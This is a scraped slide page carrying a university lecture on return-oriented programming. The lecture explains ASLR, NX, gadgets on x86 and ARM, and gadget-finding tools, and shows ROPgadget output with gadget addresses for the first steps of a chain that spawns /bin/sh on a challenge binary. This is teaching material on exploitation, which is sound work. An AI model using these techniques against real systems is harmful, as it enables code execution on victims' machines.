Triton and Symbolic execution on GDB@DEF CON ChinaTriton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON China
Wei-Bo Chen
 
x86
x86x86
x86
Wei-Bo Chen
 
Klee and angr
Klee and angrKlee and angr
Klee and angr
Wei-Bo Chen
 
IOT Exploitation
IOT Exploitation IOT Exploitation
IOT Exploitation
Cysinfo Cyber Security Community
 
[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland
Zoltan Balazs
 

Weitere Àhnliche Inhalte

Was ist angesagt?

Virtual platform
Virtual platformVirtual platform
Virtual platform
sean chen
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
 
Processor Verification Using Open Source Tools and the GCC Regression Test Suite
Processor Verification Using Open Source Tools and the GCC Regression Test SuiteProcessor Verification Using Open Source Tools and the GCC Regression Test Suite
Processor Verification Using Open Source Tools and the GCC Regression Test Suite
DVClub
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
Verilator: Fast, Free, But for Me?
Verilator: Fast, Free, But for Me? Verilator: Fast, Free, But for Me?
Verilator: Fast, Free, But for Me?
DVClub
 

Was ist angesagt? (20)

How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Virtual platform
Virtual platformVirtual platform
Virtual platform
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
ROP èŒ•éŹ†è«‡
ROP èŒ•éŹ†è«‡ROP èŒ•éŹ†è«‡
ROP èŒ•éŹ†è«‡
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigation
 
Processor Verification Using Open Source Tools and the GCC Regression Test Suite
Processor Verification Using Open Source Tools and the GCC Regression Test SuiteProcessor Verification Using Open Source Tools and the GCC Regression Test Suite
Processor Verification Using Open Source Tools and the GCC Regression Test Suite
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
fg.workshop: Software vulnerability
fg.workshop: Software vulnerabilityfg.workshop: Software vulnerability
fg.workshop: Software vulnerability
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
 
2021.laravelconf.tw.slides2
2021.laravelconf.tw.slides22021.laravelconf.tw.slides2
2021.laravelconf.tw.slides2
 
Verilator: Fast, Free, But for Me?
Verilator: Fast, Free, But for Me? Verilator: Fast, Free, But for Me?
Verilator: Fast, Free, But for Me?
 
Triton and symbolic execution on gdb
Triton and symbolic execution on gdbTriton and symbolic execution on gdb
Triton and symbolic execution on gdb
 
Triton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON ChinaTriton and Symbolic execution on GDB@DEF CON China
Triton and Symbolic execution on GDB@DEF CON China
 
x86
x86x86
x86
 
Klee and angr
Klee and angrKlee and angr
Klee and angr
 

Andere mochten auch

[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
CODE BLUE
 
Tutorial server ubuntu
Tutorial server ubuntuTutorial server ubuntu
Tutorial server ubuntu
Jisim Kuring
 
Uji performa kontroler on Semnasteknomedia Amikom 2015
Uji performa kontroler on Semnasteknomedia Amikom 2015Uji performa kontroler on Semnasteknomedia Amikom 2015
Uji performa kontroler on Semnasteknomedia Amikom 2015
STKIP PGRI Tulungagung, Jawa Timur
 
password series
password seriespassword series
password series
Ammar WK
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Lyon Yang
 

Andere mochten auch (20)

IOT Exploitation
IOT Exploitation IOT Exploitation
IOT Exploitation
 
[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland
 
Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit development
 
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd PerspectiveArduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
 
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
System Hacking Tutorial #4 - Buffer Overflow - Return Oriented Programming ak...
 
Automating Return Oriented Programming Attacks
Automating Return Oriented Programming AttacksAutomating Return Oriented Programming Attacks
Automating Return Oriented Programming Attacks
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
 
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
 
Alur attacking web (sisi client)
Alur attacking web (sisi client)Alur attacking web (sisi client)
Alur attacking web (sisi client)
 
Hardware Hacking
Hardware HackingHardware Hacking
Hardware Hacking
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Tutorial server ubuntu
Tutorial server ubuntuTutorial server ubuntu
Tutorial server ubuntu
 
Uji performa kontroler on Semnasteknomedia Amikom 2015
Uji performa kontroler on Semnasteknomedia Amikom 2015Uji performa kontroler on Semnasteknomedia Amikom 2015
Uji performa kontroler on Semnasteknomedia Amikom 2015
 
password series
password seriespassword series
password series
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Had sec mikrotik administrator
Had sec mikrotik administratorHad sec mikrotik administrator
Had sec mikrotik administrator
 
Penetrasi Jaringan
Penetrasi JaringanPenetrasi Jaringan
Penetrasi Jaringan
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 

Ähnlich wie Course lecture - An introduction to the Return Oriented Programming

Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Alexandre Moneger
 
Everybody be cool, this is a ROPpery
Everybody be cool, this is a ROPperyEverybody be cool, this is a ROPpery
Everybody be cool, this is a ROPpery
Vincenzo Iozzo
 

Ähnlich wie Course lecture - An introduction to the Return Oriented Programming (20)

Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
 
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
 
Vc4c development of opencl compiler for videocore4
Vc4c development of opencl compiler for videocore4Vc4c development of opencl compiler for videocore4
Vc4c development of opencl compiler for videocore4
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
Power of linked list
Power of linked listPower of linked list
Power of linked list
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
 
Everybody be cool, this is a ROPpery
Everybody be cool, this is a ROPperyEverybody be cool, this is a ROPpery
Everybody be cool, this is a ROPpery
 
Embedded system - introduction to arm7
Embedded system - introduction to arm7Embedded system - introduction to arm7
Embedded system - introduction to arm7
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
 
Dive into PySpark
Dive into PySparkDive into PySpark
Dive into PySpark
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
 
"Đ Đ°Đ·ĐČОтОД ĐČДтĐșĐž PHP-7"
"Đ Đ°Đ·ĐČОтОД ĐČДтĐșĐž PHP-7""Đ Đ°Đ·ĐČОтОД ĐČДтĐșĐž PHP-7"
"Đ Đ°Đ·ĐČОтОД ĐČДтĐșĐž PHP-7"
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Raspberry Pi + ROS
Raspberry Pi + ROSRaspberry Pi + ROS
Raspberry Pi + ROS
 
Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!Understanding eBPF in a Hurry!
Understanding eBPF in a Hurry!
 
Puppet Camp Paris 2014: Test Driven Development
Puppet Camp Paris 2014: Test Driven DevelopmentPuppet Camp Paris 2014: Test Driven Development
Puppet Camp Paris 2014: Test Driven Development
 
20140408 tdd puppetcamp-paris
20140408 tdd puppetcamp-paris20140408 tdd puppetcamp-paris
20140408 tdd puppetcamp-paris
 

Mehr von Jonathan Salwan

St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...
St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...
St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...
Jonathan Salwan
 

Mehr von Jonathan Salwan (6)

How Triton can help to reverse virtual machine based software protections
How Triton can help to reverse virtual machine based software protectionsHow Triton can help to reverse virtual machine based software protections
How Triton can help to reverse virtual machine based software protections
 
Dynamic Binary Analysis and Obfuscated Codes
Dynamic Binary Analysis and Obfuscated Codes Dynamic Binary Analysis and Obfuscated Codes
Dynamic Binary Analysis and Obfuscated Codes
 
Sstic 2015 detailed_version_triton_concolic_execution_frame_work_f_saudel_jsa...
Sstic 2015 detailed_version_triton_concolic_execution_frame_work_f_saudel_jsa...Sstic 2015 detailed_version_triton_concolic_execution_frame_work_f_saudel_jsa...
Sstic 2015 detailed_version_triton_concolic_execution_frame_work_f_saudel_jsa...
 
St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...
St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...
St hack2015 dynamic_behavior_analysis_using_binary_instrumentation_jonathan_s...
 
Covering a function using a Dynamic Symbolic Execution approach
Covering a function using a Dynamic Symbolic Execution approach Covering a function using a Dynamic Symbolic Execution approach
Covering a function using a Dynamic Symbolic Execution approach
 
Software testing and concolic execution LSE 2013
Software testing and concolic execution LSE 2013Software testing and concolic execution LSE 2013
Software testing and concolic execution LSE 2013
 

KĂŒrzlich hochgeladen

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel AraĂșjo
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 

KĂŒrzlich hochgeladen (20)

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Course lecture - An introduction to the Return Oriented Programming

  • 1. An introduction to the Return Oriented Programming Why and How Course lecture at the Bordeaux university for the CSI Master Jonathan Salwan Keywords: ROP Intel / ARM, Tools, ROP chain generation, gadgets' semantics, ASLR and NX internal, JOP, SOP, BROP, SROP, example with CVE-2011-1938
  • 2. Road-map ● Classical attacks without any security – Stack overflow exploitation in 2009 ● Mitigation against these classical attacks – Address space layout randomization – Not eXecute Bit ● ROP introduction – What is the ROP? – Why use the ROP? – How can we find gadgets? – Tools which can help you ● Real example – CVE-2011-1938 exploitation ● Mitigation against ROP attacks ● ROP variants – JOP, SOP, BROP, SROP ● Some cool research subjects – The gadgets semantics – Rop chain generation ● Conclusion ● References 2014 - J.Salwan Course lecture on the ROP attack 2
  • 3. Classical attacks without any security ● Find the bug ● Try to control the program counter register ● Store your shellcode somewhere in memory ● Set the program counter register to point on your shellcode – Shellcode executed → you win 2014 - J.Salwan Course lecture on the ROP attack 3
  • 4. Classical attacks without any security ● Classical stack buffer overflow – Control the saved EIP – Overwrite the SEIP with an address pointing to your code 2014 - J.Salwan Course lecture on the ROP attack 4
  • 5. Mitigation against these classical attacks ● Address Space Layout Randomization ● No eXecute bit ● There are other protections but we won't describe them in this lecture – ASCII Armor – FORTIFY_SOURCE – SSP 2014 - J.Salwan Course lecture on the ROP attack 5
  • 6. Address Space Layout Randomization ● Map your Heap and Stack randomly – At each execution, your Heap and Stack will be mapped at different places – It's the same for shared libraries and VDSO ● So, now you cannot jump on an hardened address like in a classical attacks (slide 4) 2014 - J.Salwan Course lecture on the ROP attack 6
  • 7. Address Space Layout Randomization - Example ● Two executions of the same binary : 009c0000-009e1000 rw-p 00000000 00:00 0 [heap] 7fff329f5000-7fff32a16000 rw-p 00000000 00:00 0 [stack] 7fff32bde000-7fff32bdf000 r-xp 00000000 00:00 0 [vdso] 01416000-01437000 rw-p 00000000 00:00 0 [heap] 7fff2fa70000-7fff2fa91000 rw-p 00000000 00:00 0 [stack] 7fff2fb1c000-7fff2fb1d000 r-xp 00000000 00:00 0 [vdso] 2014 - J.Salwan Course lecture on the ROP attack 7
  • 8. Address Space Layout Randomization – Linux Internal ● Heap and Stack areas mapped at a pseudo-random place for each execution 2014 - J.Salwan Course lecture on the ROP attack 8
  • 9. No eXecute bit ● NX bit is a CPU feature – On Intel CPU, it works only on x86_64 or with Physical Address Extension (PAE) enable ● Enabled, it raises an exception if the CPU tries to execute something that doesn't have the NX bit set ● The NX bit is located and setup in the Page Table Entry 2014 - J.Salwan Course lecture on the ROP attack 9
  • 10. No eXecute bit – Paging Internals 2014 - J.Salwan Course lecture on the ROP attack 10
  • 11. No eXecute bit – PTE Internal ● The last bit is the NX bit (exb) – 0 = disabled – 1 = enabled 2014 - J.Salwan Course lecture on the ROP attack 11
  • 12. ROP Introduction ● When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC [1] - Buchanan, E.; Roemer, R.; Shacham, H.; Savage, S. (October 2008) ● Return-Oriented Programming: Exploits Without Code Injection [2] - Shacham, Hovav; Buchanan, Erik; Roemer, Ryan; Savage, Stefan. Retrieved 2009-08-12. 2014 - J.Salwan Course lecture on the ROP attack 12
  • 13. ROP definition ● Chain gadgets to execute malicious code. ● A gadget is a suite of instructions which end by the branch instruction ret (Intel) or the equivalent on ARM. – Intel examples: ● pop eax ; ret ● xor ebx, ebx ; ret – ARM examples: ● pop {r4, pc} ● str r1, [r0] ; bx lr ● Objective: Use gadgets instead of classical shellcode 2014 - J.Salwan Course lecture on the ROP attack 13
  • 14. A gadget can contain other gadgets ● Because x86 instructions aren't aligned, a gadget can contain another gadget. f7c7070000000f9545c3 → test edi, 0x7 ; setnz byte ptr [rbp-0x3d] ; c7070000000f9545c3 → mov dword ptr [rdi], 0xf000000 ; xchg ebp, eax ; ret ● Doesn't work on RISC architectures like ARM, MIPS, SPARC... 2014 - J.Salwan Course lecture on the ROP attack 14
  • 15. Why use the ROP? ● Gadgets are mainly located on segments without ASLR and on pages marked as executables – It can bypass the ASLR – It can bypass the NX bit 2014 - J.Salwan Course lecture on the ROP attack 15
  • 16. Road-map attack ● Find your gadgets ● Store your gadgets addresses on the stack – You must to overwrite the saved eip with the address of your first gadget 2014 - J.Salwan Course lecture on the ROP attack 16
  • 17. CALL and RET semantics (Intel x86) ●CALL semantic ESP ← ESP – 4 [ESP] ← NEXT(EIP) ; sEIP EIP ← OPERANDE ●RET semantic TMP ← [ESP] ; get the sEIP ESP ← ESP + 4 ; Align stack pointer EIP ← TMP ; restore the sEIP 2014 - J.Salwan Course lecture on the ROP attack 17
  • 18. Attack process on x86 ● Gadget1 is executed and returns ● Gadget2 is executed and returns ● Gadget3 is executed and returns ● And so on until all instructions that you want are executed ● So, the real execution is: pop eax xor edx, edx inc ecx 2014 - J.Salwan Course lecture on the ROP attack 18
  • 19. Attack process on ARM ● This is exactly the same process but this time using this kind of gadgets: pop {r3, pc} mov r0, r3 ; pop {r4, r5, r6, pc} pop {r3, r4, r5, r6, r7, pc} ● On ARM it's possible to pop a value directly in the program counter register (pc) 2014 - J.Salwan Course lecture on the ROP attack 19
  • 20. How can we find gadgets? ● Several ways to find gadgets – Old school method : objdump and grep ● Some gadgets will be not found: Objdump aligns instructions. – Make your own tool which scans an executable segment – Use an existing tool 2014 - J.Salwan Course lecture on the ROP attack 20
  • 21. Tools which can help you ● Rp++ by Axel Souchet [3] ● Ropeme by Long Le Dinh [4] ● Ropc by patkt [5] ● Nrop by Aurelien wailly [6] ● ROPgadget by Jonathan Salwan [7] 2014 - J.Salwan Course lecture on the ROP attack 21
  • 22. ROPgadget tool ● ROPgadget is : – A gadgets finder and “auto-roper” – Written in Python – Using Capstone engine – Support PE, ELF, Mach-O formats – Support x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures 2014 - J.Salwan Course lecture on the ROP attack 22
  • 23. ROPgadget tool – Quick example ● Display available gadgets $ ./ROPgadget.py --binary ./test-suite-binaries/elf-Linux-x86-NDH-chall 0x08054487 : pop edi ; pop ebp ; ret 8 0x0806b178 : pop edi ; pop esi ; ret 0x08049fdb : pop edi ; ret [...] 0x0804e76b : xor eax, eax ; pop ebx ; ret 0x0806a14a : xor eax, eax ; pop edi ; ret 0x0804aae0 : xor eax, eax ; ret 0x080c8899 : xor ebx, edi ; call eax 0x080c85c6 : xor edi, ebx ; jmp dword ptr [edx] Unique gadgets found: 2447 2014 - J.Salwan Course lecture on the ROP attack 23
  • 24. ROPgadget tool – ROP chain generation in 5 steps ● Objective : int execve(const char *filename, char *const argv[], char *const envp[]); ● Step 1 - Write-what-where gadgets – Write “/bin/sh” in memory ● Step 2 - Init syscall number gadgets – Setup execve syscall number ● Step 3 - Init syscall arguments gadgets – Setup execve arguments ● Step 4 - Syscall gadgets – Find syscall interrupt ● Step 5 - Build the ROP chain – Build the python payload 2014 - J.Salwan Course lecture on the ROP attack 24
  • 25. Step 1 Write-what-where gadgets - Step 1 -- Write-what-where gadgets [+] Gadget found: 0x80798dd mov dword ptr [edx], eax ; ret [+] Gadget found: 0x8052bba pop edx ; ret [+] Gadget found: 0x80a4be6 pop eax ; ret [+] Gadget found: 0x804aae0 xor eax, eax ; ret ● The edx register is the destination ● The eax register is the content ● xor eax, eax is used to put the null byte at the end 2014 - J.Salwan Course lecture on the ROP attack 25
  • 26. Step 2 Init syscall number gadgets - Step 2 -- Init syscall number gadgets [+] Gadget found: 0x804aae0 xor eax, eax ; ret [+] Gadget found: 0x8048ca6 inc eax ; ret ● xor eax, eax is used to initialize the context to zero ● inc eax is used 11 times to setup the exceve syscall number 2014 - J.Salwan Course lecture on the ROP attack 26
  • 27. Step 3 Init syscall arguments gadgets - Step 3 -- Init syscall arguments gadgets [+] Gadget found: 0x8048144 pop ebx ; ret [+] Gadget found: 0x80c5dd2 pop ecx ; ret [+] Gadget found: 0x8052bba pop edx ; ret ● int execve(const char *filename, char *const argv[], char *const envp[]); – pop ebx is used to initialize the first argument – pop ecx is used to initialize the second argument – pop edx is used to initialize the third argument 2014 - J.Salwan Course lecture on the ROP attack 27
  • 28. Step 4 Syscall gadget - Step 4 -- Syscall gadget [+] Gadget found: 0x8048ca8 int 0x80 ● int 0x80 is used to raise a syscall exception 2014 - J.Salwan Course lecture on the ROP attack 28
